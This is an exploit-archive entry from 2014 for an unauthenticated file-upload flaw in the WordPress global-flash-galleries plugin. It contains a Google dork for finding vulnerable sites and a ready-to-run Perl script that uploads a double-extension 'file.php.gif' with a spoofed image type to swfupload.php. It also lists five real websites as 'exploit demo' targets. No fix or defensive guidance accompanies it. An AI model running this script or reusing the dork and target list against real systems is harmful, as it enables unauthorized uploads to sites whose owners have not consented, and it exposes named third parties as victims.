WordPress Global Flash Galleries File Upload



EKU-ID: 3771 CVE: OSVDB-ID:
Author: Ashiyane Digital Security Team Published: 2014-01-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


###############################################################
# Exploit Title: WordPress global-flash-galleries Plugin Remote File
Upload Vulnerability
# Author: Ashiyane Digital Security Team
# Date: 01/18/2014
# Vendor Homepage: http://wordpress.org
# Software Link :
http://downloads.wordpress.org/plugin/global-flash-galleries.zip
# Google dork: inurl:/wp-content/plugins/global-flash-galleries/
# Tested on: Windows/Linux
###############################################################

# Description :
	Global-Flash Galleris allows file upload to unauthenticated users. Filters in
	place only permits uploads of image files (extensions .gif, .png and .jpg).
	This avoids scripts execution problems but an
	attacker could use the affected system to Host files.

Vulnerability occurs due an innapropiate cookie validation in :
/global-flash-galleries/swfupload.php
	
	
# Exploit :
= = = = = = = = =
[Perl]
	#! /usr/bin/perl
	use LWP;
	use HTTP::Request::Common;
	
	my ($url, $file) = @ARGV;
	
	my $ua = LWP::UserAgent->new();
	my $req = POST $url,
		Content_Type => 'form-data',
		Content =>    [
	name => $name,
	galleryselect => 1, # Gallery ID (popup.php)
	Filedata => [ "$file", "file.php.gif",  Content_Type =>
	'image/gif' ]
						];
	my $res = $ua->request( $req );
	if( $res->is_success ) {
		print $res->content;
	} else {
		print $res->status_line, "\n";
	}
[Perl]

# Exploit demo :
= = = = = = = = =
http://radiostan.fm/wp-content/plugins/global-flash-galleries/swfupload.php
http://izhairstudio.ca/wp-content/plugins/global-flash-galleries/swfupload.php
http://awb.usahidsolo.ac.id/wp-content/plugins/global-flash-galleries/swfupload.php
http://minigolfcourseulles.fr/wp-content/plugins/global-flash-galleries//swfupload.php
http://madiro-hotel.com/wp-content/plugins/global-flash-galleries/swfupload.php

# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# Special Tnx to V1R4N64R ,C4T,HAMIDx9
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #